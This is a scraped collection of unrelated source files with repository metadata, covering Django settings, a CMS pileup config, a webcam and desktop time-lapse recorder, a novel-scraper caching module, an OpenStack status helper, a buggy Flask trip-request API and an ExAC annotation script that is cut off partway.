DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'login_app',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'login_and_reg.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'login_and_reg.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"wilsonbluong@gmail.com"
] | wilsonbluong@gmail.com |
1b8eaa30f76e70cfc285f4f677afdfc236302cae | ee692010c2596a31848b0273db1d054e3fb0d208 | /MetaData/python/PU_MixFiles_2017_miniaodv2_310/mix_2017MC_GJets_HT-40To100_TuneCP5_13TeV-madgraphMLM-pythia8.py | 4ae63072d88142e6f1113a614b3070efeef65e66 | [] | no_license | cms-analysis/flashgg | 67e2dca6070e7a0e876d19d9b3ad6b021485bf28 | 4edea8897e2a4b0518dca76ba6c9909c20c40ae7 | refs/heads/dev_legacy_runII | 2023-06-18T05:40:10.010854 | 2023-05-30T07:53:40 | 2023-05-30T07:53:40 | 20,220,358 | 27 | 205 | null | 2023-05-30T07:53:42 | 2014-05-27T13:10:32 | C++ | UTF-8 | Python | false | false | 3,048 | py | import FWCore.ParameterSet.Config as cms
# configuration to model pileup for initial physics phase
from SimGeneral.MixingModule.mixObjects_cfi import theMixObjects
from SimGeneral.MixingModule.mixPoolSource_cfi import *
from SimGeneral.MixingModule.digitizers_cfi import *
mix = cms.EDProducer("MixingModule",
digitizers = cms.PSet(theDigitizers),
LabelPlayback = cms.string(''),
maxBunch = cms.int32(3),
minBunch = cms.int32(-12), ## in terms of 25 nsec
bunchspace = cms.int32(25), ##ns
mixProdStep1 = cms.bool(False),
mixProdStep2 = cms.bool(False),
playback = cms.untracked.bool(False),
useCurrentProcessOnly = cms.bool(False),
input = cms.SecSource("EmbeddedRootSource",
type = cms.string('probFunction'),
nbPileupEvents = cms.PSet(
probFunctionVariable = cms.vint32(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99),
probValue = cms.vdouble(
0.0186132,0.000399219,0.00124014,0.0013149,0.00118849,0.00138384,0.00113352,0.00121015,0.00231722,0.00178472,0.00229306,0.00312774,0.00435684,0.00657119,0.00870848,0.0110405,0.0137307,0.0163249,0.0192129,0.0217532,0.0235267,0.0244565,0.0253839,0.0260153,0.0268241,0.0280434,0.029164,0.0292138,0.0287353,0.0289874,0.0284372,0.0291111,0.0289168,0.0284458,0.0281134,0.0273704,0.0267777,0.0250286,0.0246389,0.02363,0.0219221,0.0196755,0.0179232,0.0163309,0.0146499,0.0138694,0.0124274,0.0119393,0.0115549,0.0119637,0.0119622,0.0120341,0.011665,0.012052,0.0116119,0.0119076,0.0116807,0.0117792,0.0111979,0.0104097,0.00903356,0.00768429,0.00668635,0.00526191,0.0042346,0.00341179,0.00292782,0.00248153,0.00167935,0.00139217,0.00102127,0.000805727,0.00072326,0.000235117,0.000494599,0.000481479,0.000421502,6.12261e-05,4.18587e-05,0.000995445,0.000616218,0.000109541,0.000330288,5.16465e-05,0.000327789,0.000326748,7.70533e-05,2.04087e-05,0.00094359,6.24756e-07,6.24756e-07,4.16504e-07,4.16504e-07,4.16504e-07,0,1.04126e-06,2.70728e-06,6.24756e-07,6.24756e-07,3.26956e-05
),
histoFileName = cms.untracked.string('histProbFunction.root'),
),
sequential = cms.untracked.bool(False),
manage_OOT = cms.untracked.bool(True), ## manage out-of-time pileup
## setting this to True means that the out-of-time pileup
## will have a different distribution than in-time, given
## by what is described on the next line:
OOT_type = cms.untracked.string('Poisson'), ## generate OOT with a Poisson matching the number chosen for in-time
#OOT_type = cms.untracked.string('fixed'), ## generate OOT with a fixed distribution
#intFixed_OOT = cms.untracked.int32(2),
fileNames = FileNames
),
mixObjects = cms.PSet(theMixObjects)
)
| [
"noreply@github.com"
] | cms-analysis.noreply@github.com |
94a36e04ac2d6a5b3d6282e7a6e18b4676c908cc | 39502ddee170646c55fc13b01626a51f08c9b02b | /main.py | 88bc403d25f54bbc912895c21b6786cdfc90a30c | [
"MIT"
] | permissive | PWN0N/Working-Time-lapse | 9688c8a8210a72654862582c96e1dd107a0670ed | 1ebe4cb1a669a1b77528b4f2583e27fdd4e5953b | refs/heads/master | 2020-12-07T23:35:45.072572 | 2020-01-09T14:57:13 | 2020-01-09T14:57:13 | 232,826,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | import signal
import numpy as np
from PIL import ImageGrab
import cv2
import time
import sys
import os
flips_time_mins = 30
interval = 5 # seconds
num_frames = flips_time_mins*60/interval
num_frames = int(num_frames)
year = -1
month = -1
day = -1
out_fps = 24
cammode = 0
shutdown_msg = False
def signal_handler(signal,frame):
print('You Pressed Ctrl+C, The Program Will Be Shutdown')
global shutdown_msg
shutdown_msg = True
print('Saving Videos')
def add_timestamp(img):
time_str= time.strftime("%Y-%m-%d %H:%M:%S")
color=(255,255,255)
if np.mean( img[700:780,900:950])>128:
color=(0,0,0)
cv2.putText(img, time_str, (900, 700) ,cv2.FONT_HERSHEY_SIMPLEX ,0.8, color ,2)
return img
capture = cv2.VideoCapture(0)
capture1 = cv2.VideoCapture(1)
cam, _ = capture.read()
cam1, _ = capture1.read()
if(cam and cam1):
print('Dual Camera Mode')
cammode = 1
elif(cam):
print('Single Camera Mode')
cammode = 2
else:
print('No Camera Detect!')
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
# capture frames to video
while True:
if(day != time.strftime("%d")):
year = time.strftime("%Y")
month = time.strftime("%m")
day = time.strftime("%d")
hour = time.strftime("%H")
save_dir = "{0}/{1}/{2}".format(year, month, day)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
# innner camera init
size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
codec = cv2.VideoWriter.fourcc('M', 'J', 'P', 'G')
cam_filename = save_dir+"/cam_{:4}.avi".format(time.strftime("%H%M"))
video = cv2.VideoWriter(cam_filename, codec, out_fps, size)
# for low quality webcams, discard the starting unstable frames
for i in range(20):
capture.read()
# desktop screen init
desktopim = np.array(ImageGrab.grab().convert('RGB'))
# desktopFrame =np.array(desktopim.getdata(),dtype='uint8')\
# .reshape((desktopim.size[1],desktopim.size[0],3))
sp = desktopim.shape
sz1 = sp[0] # height(rows) of image
sz2 = sp[1] # width(colums) of image
desktopsize = (int(sz2),int(sz1))
codec = cv2.VideoWriter.fourcc('M', 'J', 'P', 'G')
desktop_filename = save_dir+"/desktop_{:4}.avi".format(time.strftime("%H%M"))
desktopvideo = cv2.VideoWriter(desktop_filename, codec, out_fps, desktopsize)
# outter camera init
if (cammode == 1):
size1 = (int(capture1.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(capture1.get(cv2.CAP_PROP_FRAME_HEIGHT)))
cam1_filename = save_dir+"/cam1_{:4}.avi".format(time.strftime("%H%M"))
video1 = cv2.VideoWriter(cam1_filename, codec, out_fps, size1)
# for low quality webcams, discard the starting unstable frames
for i in range(20):
capture1.read()
for i in range(num_frames):
if (shutdown_msg):
break
_, frame = capture.read()
video.write(add_timestamp(frame))
desktopim = np.array(ImageGrab.grab().convert('RGB'))
# ImageGrab and OpenCV have different color space
desktopFrame = cv2.cvtColor(desktopim, cv2.COLOR_BGR2RGB)
desktopvideo.write(add_timestamp(desktopFrame))
if (cammode == 1):
_, frame1 = capture1.read()
video1.write(add_timestamp(frame1))
time.sleep(interval)
video.release()
desktopvideo.release()
if (cammode == 1):
video1.release()
if (shutdown_msg):
break
capture.release()
if(cammode ==1):
capture1.release()
print('Done!')
print('Exit The Program')
sys.exit(0)
| [
"juangshin@gmail.com"
] | juangshin@gmail.com |
dc406b8fcccc1b7a9739c3696ab62e5757aea49e | cbb7ac0cc690c2d3af1873a876cda7ea99776424 | /owllook/fetcher/cache.py | fdccbe18e5fe86cc3c409c844afb886bf7c1dbf6 | [
"Apache-2.0"
] | permissive | demidroid/owllook | 8c4dfab3d18da3d8af143f3d78e378e74e8c4fc0 | eb385b34af3acad55829c5584dc69b7275cc398f | refs/heads/master | 2021-05-14T10:46:24.722794 | 2017-09-18T12:43:12 | 2017-09-18T12:43:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,187 | py | #!/usr/bin/env python
import aiohttp
import asyncio
import re
import async_timeout
from bs4 import BeautifulSoup
from aiocache.serializers import PickleSerializer
from aiocache.log import logger
from aiocache.utils import get_args_dict, get_cache
from urllib.parse import urlparse, parse_qs
from owllook.database.mongodb import MotorBase
from owllook.fetcher.baidu_novels import baidu_search
from owllook.fetcher.so_novels import so_search
from owllook.fetcher.function import target_fetch, get_time, requests_target_fetch
from owllook.fetcher.extract_novels import extract_pre_next_chapter
from owllook.config import RULES, LATEST_RULES, LOGGER
# Token from https://github.com/argaen/aiocache/blob/master/aiocache/decorators.py
def cached(
ttl=0, key=None, key_from_attr=None, cache=None, serializer=None, plugins=None, **kwargs):
"""
Caches the functions return value into a key generated with module_name, function_name and args.
In some cases you will need to send more args to configure the cache object.
An example would be endpoint and port for the RedisCache. You can send those args as
kwargs and they will be propagated accordingly.
:param ttl: int seconds to store the function call. Default is 0 which means no expiration.
:param key: str value to set as key for the function return. Takes precedence over
key_from_attr param. If key and key_from_attr are not passed, it will use module_name
+ function_name + args + kwargs
:param key_from_attr: arg or kwarg name from the function to use as a key.
:param cache: cache class to use when calling the ``set``/``get`` operations.
Default is the one configured in ``aiocache.settings.DEFAULT_CACHE``
:param serializer: serializer instance to use when calling the ``dumps``/``loads``.
Default is the one configured in ``aiocache.settings.DEFAULT_SERIALIZER``
:param plugins: plugins to use when calling the cmd hooks
Default is the one configured in ``aiocache.settings.DEFAULT_PLUGINS``
"""
cache_kwargs = kwargs
def cached_decorator(func):
async def wrapper(*args, **kwargs):
cache_instance = get_cache(
cache=cache, serializer=serializer, plugins=plugins, **cache_kwargs)
args_dict = get_args_dict(func, args, kwargs)
cache_key = key or args_dict.get(
key_from_attr,
(func.__module__ or 'stub') + func.__name__ + str(args) + str(kwargs))
try:
if await cache_instance.exists(cache_key):
return await cache_instance.get(cache_key)
except Exception:
logger.exception("Unexpected error with %s", cache_instance)
result = await func(*args, **kwargs)
if result:
try:
await cache_instance.set(cache_key, result, ttl=ttl)
except Exception:
logger.exception("Unexpected error with %s", cache_instance)
return result
return wrapper
return cached_decorator
@cached(ttl=300, key_from_attr='url', serializer=PickleSerializer(), namespace="main")
async def cache_owllook_novels_content(url, netloc):
async with aiohttp.ClientSession() as client:
html = await target_fetch(client=client, url=url)
if html:
soup = BeautifulSoup(html, 'html5lib')
selector = RULES[netloc].content_selector
if selector.get('id', None):
content = soup.find_all(id=selector['id'])
elif selector.get('class', None):
content = soup.find_all(class_=selector['class'])
else:
content = soup.find_all(selector.get('tag'))
if content:
# 提取出真正的章节标题
title_reg = r'(第?\s*[一二两三四五六七八九十○零百千万亿0-91234567890]{1,6}\s*[章回卷节折篇幕集]\s*.*?)[_,-]'
title = soup.title.string
extract_title = re.findall(title_reg, title, re.I)
title = extract_title[0] if extract_title else title
# if "_" in title:
# title = title.split('_')[0]
# elif "-" in title:
# title = title.split('-')[0]
next_chapter = extract_pre_next_chapter(chapter_url=url, html=str(soup))
content = [str(i) for i in content]
data = {
'content': ''.join(content),
'next_chapter': next_chapter,
'title': title
}
else:
data = None
return data
return None
@cached(ttl=300, key_from_attr='url', serializer=PickleSerializer(), namespace="main")
async def cache_owllook_novels_chapter(url, netloc):
async with aiohttp.ClientSession() as client:
html = await target_fetch(client=client, url=url)
if html:
soup = BeautifulSoup(html, 'html5lib')
selector = RULES[netloc].chapter_selector
if selector.get('id', None):
content = soup.find_all(id=selector['id'])
elif selector.get('class', None):
content = soup.find_all(class_=selector['class'])
else:
content = soup.find_all(selector.get('tag'))
return str(content) if content else None
return None
@cached(ttl=86400, key_from_attr='novels_name', serializer=PickleSerializer(), namespace="novels_name")
async def cache_owllook_baidu_novels_result(novels_name):
result = await baidu_search(novels_name)
parse_result = [i for i in result if i]
return parse_result if parse_result else None
@cached(ttl=86400, key_from_attr='novels_name', serializer=PickleSerializer(), namespace="novels_name")
async def cache_owllook_so_novels_result(novels_name):
result = await so_search(novels_name)
parse_result = [i for i in result if i]
return parse_result if parse_result else None
@cached(ttl=10800, key_from_attr='search_ranking', serializer=PickleSerializer(), namespace="ranking")
async def cache_owllook_search_ranking():
motor_db = MotorBase().db
keyword_cursor = motor_db.search_records.find(
{'count': {'$gte': 50}},
{'keyword': 1, 'count': 1, '_id': 0}
).sort('count', -1).limit(25)
result = []
index = 1
async for document in keyword_cursor:
result.append({'keyword': document['keyword'], 'count': document['count'], 'index': index})
index += 1
return result
@cached(ttl=3600, key_from_attr='search_ranking', serializer=PickleSerializer(), namespace="ranking")
async def cache_others_search_ranking(spider='qidian', novel_type='全部类别'):
motor_db = MotorBase().db
item_data = await motor_db.novels_ranking.find_one({'spider': spider, 'type': novel_type}, {'data': 1, '_id': 0})
return item_data
async def get_the_latest_chapter(chapter_url, loop=None):
try:
with async_timeout.timeout(60):
url = parse_qs(urlparse(chapter_url).query).get('url', '')
novels_name = parse_qs(urlparse(chapter_url).query).get('novels_name', '')
data = None
if url and novels_name:
url = url[0]
novels_name = novels_name[0]
netloc = urlparse(url).netloc
if netloc in LATEST_RULES.keys():
async with aiohttp.ClientSession(loop=loop) as client:
try:
html = await target_fetch(client=client, url=url)
if html is None:
html = requests_target_fetch(url=url)
except TypeError:
html = requests_target_fetch(url=url)
except Exception as e:
LOGGER.exception(e)
return None
try:
soup = BeautifulSoup(html, 'html5lib')
except Exception as e:
LOGGER.exception(e)
return None
latest_chapter_name, latest_chapter_url = None, None
if LATEST_RULES[netloc].plan:
meta_value = LATEST_RULES[netloc].meta_value
latest_chapter_name = soup.select(
'meta[property="{0}"]'.format(meta_value["latest_chapter_name"]))
latest_chapter_name = latest_chapter_name[0].get('content',
None) if latest_chapter_name else None
latest_chapter_url = soup.select(
'meta[property="{0}"]'.format(meta_value["latest_chapter_url"]))
latest_chapter_url = latest_chapter_url[0].get('content',
None) if latest_chapter_url else None
else:
selector = LATEST_RULES[netloc].selector
content_url = selector.get('content_url')
if selector.get('id', None):
latest_chapter_soup = soup.find_all(id=selector['id'])
elif selector.get('class', None):
latest_chapter_soup = soup.find_all(class_=selector['class'])
else:
latest_chapter_soup = soup.select(selector.get('tag'))
if latest_chapter_soup:
if content_url == '1':
# TODO
pass
elif content_url == '0':
# TODO
pass
else:
latest_chapter_url = content_url + latest_chapter_soup[0].get('href', None)
latest_chapter_name = latest_chapter_soup[0].get('title', None)
if latest_chapter_name and latest_chapter_url:
time_current = get_time()
data = {
"latest_chapter_name": latest_chapter_name,
"latest_chapter_url": latest_chapter_url,
"owllook_chapter_url": chapter_url,
"owllook_content_url": "/owllook_content?url={latest_chapter_url}&name={name}&chapter_url={chapter_url}&novels_name={novels_name}".format(
latest_chapter_url=latest_chapter_url,
name=latest_chapter_name,
chapter_url=url,
novels_name=novels_name,
),
}
# 存储最新章节
motor_db = MotorBase().db
await motor_db.latest_chapter.update_one(
{"novels_name": novels_name, 'owllook_chapter_url': chapter_url},
{'$set': {'data': data, "finished_at": time_current}}, upsert=True)
return data
except Exception as e:
LOGGER.exception(e)
return None
async def update_all_books(loop):
try:
motor_db = MotorBase().db
# 获取所有书架链接游标
books_url_cursor = motor_db.user_message.find({}, {'books_url.book_url': 1, '_id': 0})
book_urls = []
already_urls = set()
async for document in books_url_cursor:
if document:
books_url = document['books_url']
for book_url in books_url:
chapter_url = book_url['book_url']
if chapter_url not in already_urls:
try:
with async_timeout.timeout(20):
await get_the_latest_chapter(chapter_url, loop)
except Exception as e:
LOGGER.exception(e)
already_urls.add(chapter_url)
# 一组书架链接列表数据
# book_urls += [book_url['book_url'] for book_url in books_url]
# url_tasks = [get_the_latest_chapter(each_url, loop) for each_url in set(book_urls)]
# tasks = [asyncio.ensure_future(i) for i in url_tasks]
# try:
# await asyncio.gather(*tasks)
# except asyncio.TimeoutError as e:
# pass
except Exception as e:
LOGGER.exception(e)
return False
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
d0ecd64306843d99786527eb755a6f027b3eabf0 | 6b0474d4402c8c64264658472dce4880fdf5faa7 | /server/env/bin/pip | 8a9c5f33980e8ad281ccd0474633414177c48993 | [] | no_license | ndanekov/SoundEtitor | a6603856d2befa2618510fc28e5bc54aaea82b48 | f8bb5df23db107ffe1c580761688cfbeeb5e1586 | refs/heads/master | 2021-05-23T10:09:51.890871 | 2020-04-24T11:45:24 | 2020-04-24T11:45:24 | 253,235,032 | 0 | 0 | null | 2021-01-05T23:51:18 | 2020-04-05T12:56:38 | Python | UTF-8 | Python | false | false | 264 | #!/home/demo/webapps/SoundEditor/server/env/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"ndanekov@visteon.com"
] | ndanekov@visteon.com | |
0de89bf37b2188627d7e101337a48dc428a6e524 | 0ddc60e3df2e8017c934fef4c4c50e757a3a1093 | /bookpatient/urls.py | cfe46b25c848084d440d2b4e066e9f8709404da1 | [] | no_license | AyanNandaGoswami/OnlineBedBookingSystem | 46ac8d155774bba89f2785bf5a44095b7214859f | 922aa61d05ef9942f3134e8f6eb870916beb8b37 | refs/heads/master | 2023-04-26T15:32:47.535157 | 2021-05-24T13:30:27 | 2021-05-24T13:30:27 | 365,438,714 | 1 | 0 | null | 2021-05-24T13:30:29 | 2021-05-08T06:36:12 | JavaScript | UTF-8 | Python | false | false | 173 | py | from django.urls import path
from .api import BookBedAPI
app_name = 'bookpatient'
urlpatterns = [
path('add-new-bed/', BookBedAPI.as_view(), name='book_new_bed'),
]
| [
"ayan02472@gmail.com"
] | ayan02472@gmail.com |
8a1c7f9881a66c19227307b4c8279944234b51da | 232e351b56bd0f281219459255d14b25f2743df9 | /skintonemodel.py | 0d504609afe085aa04a740bdcab32f24f72aae17 | [] | no_license | Fox520/RandomScripts | 9e083d5c03668b924bf77b0eb83c42c9d263e8c0 | 9939c616615faf87b05fda562d8cb6c84cd1adf8 | refs/heads/master | 2022-11-19T01:14:13.340451 | 2020-07-09T09:01:47 | 2020-07-09T09:01:47 | 275,651,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("out.csv")
hsn_counts = dict(df["Client Skin Tone"].value_counts())
fig, ax = plt.subplots()
keys = list(hsn_counts.keys())
values = list(hsn_counts.values())
ax.bar(keys, values, label="count")
for a, b in zip(keys, values):
plt.text(a, b, str(b))
ax.set_title("Client Skin Tone")
ax.legend()
plt.show()
| [
""
] | |
82b51fe93c8b41331689f871b18a4710ae4130c9 | 3e7000dfb8d818ffd439a6bd20b86cc616ec93ab | /BinaryTreeToBinarySearchTree.py | a6fdd94e54918b478f2dd66f232fe40409aa2ab3 | [] | no_license | marsunique/LeetCodeOJ | 56c32f27a5eeb88f6c932d3c224fef6aa572036f | 2bcd0f6a704346cdac4ecccd6c0baef579d38fac | refs/heads/master | 2021-01-24T11:00:43.864200 | 2017-12-04T15:06:13 | 2017-12-04T15:06:13 | 70,289,177 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # 1) Create a temp array arr[] that stores inorder traversal of the tree. This step takes O(n) time.
# 2) Sort the temp array arr[]. Time complexity of this step depends upon the sorting algorithm. In the following implementation, Quick Sort is used which takes (n^2) time. This can be done in O(nLogn) time using Heap Sort or Merge Sort.
# 3) Again do inorder traversal of tree and copy array elements to tree nodes one by one. This step takes *O(n) time. (*Not really, nodes.pop(0) also takes time)
def binaryTreeToBST(root):
if not root:
return None
nodes = []
storePreOrder(root, nodes)
nodes.sort()
buildBST(root, nodes)
def storePreOrder(root, nodes):
if not root:
return
storePreOrder(root.left, nodes)
nodes.append(root.val)
storePreOrder(root.right, nodes)
def buildBST(root, nodes):
if not root:
return
buildBST(root.left, nodes)
root.val = nodes.pop(0)
buildBST(root.right, nodes) | [
"marsunique@gmail.com"
] | marsunique@gmail.com |
49ff6d0647e90328d83dcb70674c331fa8cdfba9 | bc208f555386f71c27668d6b470ccf77941be288 | /build/FlaskApp/utility/Status.py | 60a9a74c3d18b0baba531163eb6780bf30a8e4ac | [] | no_license | sohan99/openstackVM | f9ae8b63bdf571ff5ad19b3b128adc4fa77d7c8f | a4598a82fc0e82f0d1824cd8bad5d681cbf61723 | refs/heads/master | 2016-09-06T11:38:01.438271 | 2015-10-13T20:51:07 | 2015-10-13T20:51:07 | 42,589,521 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py |
import sys, getopt
import configReader
import LogDump
from novaclient import client
import novaclient.exceptions
class status:
def __init__(self):
authDict = {}
KEY_FILE = "key.conf"
try:
authDict = configReader.readConfigFile(KEY_FILE,"KeystoneAuth")
self.nova=client.Client(authDict['versionnumber'], authDict['username'], authDict['password'], authDict['tennantname'], authDict['authurl'])
print "initialized nova object "
except:
print "ERROR Occured while initializing nova object"
def getStatus(self):
statusDict={}
statusDict['error'] = "GOOD"
try:
instance = self.nova.servers.list()
names=[]
statuses=[]
console_url=[]
count=0
for each in instance:
names.append(str(each.name));
statuses.append(str(each.status));
if statuses[count] == "ACTIVE":
console_url.append(str(each.get_vnc_console('novnc')['console']['url']));
else :
console_url.append("");
count=count+1;
statusDict["count"] = count;
statusDict["names"] = names;
statusDict["status"] = statuses;
statusDict["url"] = console_url;
except :
statusDict['error']="error"
print statusDict
return str(statusDict);
if __name__ == '__main__':
x=status()
x.getStatus(); | [
"sohanspoojary99@gmail.com"
] | sohanspoojary99@gmail.com |
d38341b1d1618080340bdc9c5cee50ce678b5380 | 9577168f8a3206199d1be7c388b88d0458b4c1ed | /createapi.py | 3cea52fadc3aeba83ec6640ef0644f711ebaa605 | [] | no_license | julie-norris/interview-take-home-challenges | 4a3f297ad26e7e688b6e03c0cc39c63a9e68a5d9 | 14de8cb72ebe6b6cf4e7bb330e20f372e07c8a68 | refs/heads/master | 2020-04-02T19:49:52.611353 | 2018-12-13T23:22:17 | 2018-12-13T23:22:17 | 154,747,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,795 | py | from flask import Flask, request, jsonify, render_template, flash, session, redirect
from flask_restful import Api, Resource,reqparse
from datetime import date, time
from datetime import datetime
import uuid
app=Flask(__name__)
api = Api(app)
class Trips():
def getOpenings(self):
"""Get time openings for current week"""
id=uuid.uuid4()
deadlines = []
t = datetime.datetime.now()
weekday=datetime.datetime.today().weekday()
if t.hour < 15:
deadline = datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=0, second=0)
deadlines.append(deadline)
elif t.hour<21:
deadline=datetime.datetime(year=t.year, month=t.month, day=t.day, hour=21, minute=0, second=0)
deadlinse.append(deadline)
else:
today + datetime.timedelta(days=1)
DateTimeRange =[{
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
},
{'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=6, minute=0, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=11, minute=0, second=0)
}]
for day in range(0,7) >= weekday:
for timeRange in DateTimeRange:
for deadline in deadlines:
timeOpening={
'id': id,
'requestDeadline' : nextdeadline,
'timeSelectionRange': DateTimeRange,
timeSelectionIntervalMinutes: 5
}
TimeOpening.append(timeOpening)
return (TimeOpening, 200)
def postRequest(self,tripRequest):
"""creates trip request """
tripRequest ={
"timeOpening": TimeOpening,
"mode": mode,
"selectedTimeRange": DateTimeRange}
id=uuid.uuid4()
TripRequests={}
for k in TripRequests:
if k == id:
return "TripRequest already submitted", 403
for {timeOpening, mode, DateTimeRange} in TripRequests[v]:
if timeOpening == TimeOpening:
return "Cannot create a trip request twice for the same time opening", 403
elif (timeOpening == timeOpening, mode == 'passenger') and (DateTimeRange = {
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
}):
return "Cannot be passenger in the AM and driver in the PM", 403
elif ({timeOpening[deadline] == datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=0, second=0) and (DateTimeRange =={
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
}) or ({timeOpening[deadline] == datetime.datetime(year=t.year, month=t.month, day=t.day, hour=21, minute=0, second=0) and (DateTimeRange =={
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=6, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=11, minute=0, second=0)
}):
console.log ("Deadline has passed", 403)
## not sure how to identify the deadline to make sure TripRequest is being created before the deadline
else:
TripRequests={id:tripRequest}
TripRequests.append(tripRequest)
return tripRequest, 200
def putRequest(self,tripRequest):
"""the put method is used to update the details of trip request"""
"""Cannot modify a trip request after the deadlne and can only modify the time range + mode"""
parser-reqparse.RequestParser()
parser.add_argument("id")
args=parser.parse_args()
if TripRequest[id] in TripRequests:
return "That trip does not exist", 404
t=datetime.datetime.now()
if t.hour > 15 :
return 'The deadline to modify a trip for today has passed', 404
elif t.hour > 21:
return ' The deadline to modiy a trip for tomorrow AM has passed', 404
else:
tripRequest[id] = {
mode: args[mode],
selectedTimeRange: args[DateTimeRange]
}
return tripRequest, 200
def delete(self,tripRequest):
"""the delete method is used to delete a request """
global trips
trips = [trip for trip in TripRequests if trip["id"] != id]
return "{} is deleted.".format(trip), 200
def getRequests(self, TripRequests):
# return the content of the dictionary with status 200
for trips in TripRequests.items():
return (k,v), 200
def getRequest(self):
# get request ID from URL and look it up in the dictionary
# error 404 if not found
# return the TripRequest found with status 200
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| [
"noreply@github.com"
] | julie-norris.noreply@github.com |
8020cb403883467ba6b46d36b37b6b9b20ceabd1 | 902371721144a9883a6dee2897992f0389cd4d65 | /manuscript_analyses/exac_analysis/src/reformat_annots_exac.py | f1878d7aad5abc75de70ae359845965255f88853 | [
"MIT"
] | permissive | keoughkath/AlleleAnalyzer | e6242afc980da8ce9ed673c12aa3b928af35c470 | a33adc53f515fe5f00e519b703dd9abf006b2804 | refs/heads/master | 2022-02-09T17:22:21.106039 | 2022-02-01T02:24:37 | 2022-02-01T02:24:37 | 118,212,667 | 12 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,457 | py | import pandas as pd
in_dir = '/pollard/data/projects/AlleleAnalyzer_data/exac_data/exac_annotated_variants_by_chrom_parallel'
out_dir = '/pollard/home/kathleen/projects/AlleleAnalyzer/manuscript_analyses/exac_analysis/dat'
cas_list=['SpCas9','SpCas9_VRER','SpCas9_EQR','SpCas9_VQR_1','SpCas9_VQR_2',
'StCas9','StCas9_2','SaCas9','SaCas9_KKH','nmCas9','cjCas9','cpf1']
in_dict = {}
near_dict = {}
both_dict = {}
for cas in cas_list:
in_dict[cas] = 0
near_dict[cas] = 0
both_dict[cas] = 0
in_dict['SpCas9_VQR'] = 0
near_dict['SpCas9_VQR'] = 0
both_dict['SpCas9_VQR'] = 0
global total_vars
total_vars = 0
for chrom in list(range(1,23)) + ['X','Y']:
# for chrom in [8,22]:
chrom=str(chrom)
print(chrom)
annot_variants=pd.read_hdf(f'{in_dir}/chr{chrom}_annots.h5','all').drop(columns=['chrom','pos','ref','alt']).reset_index(drop=True)
annot_variants['id'] = annot_variants.index
# get # of variants in chromosome annotated
n_vars = len(annot_variants)
total_vars += n_vars
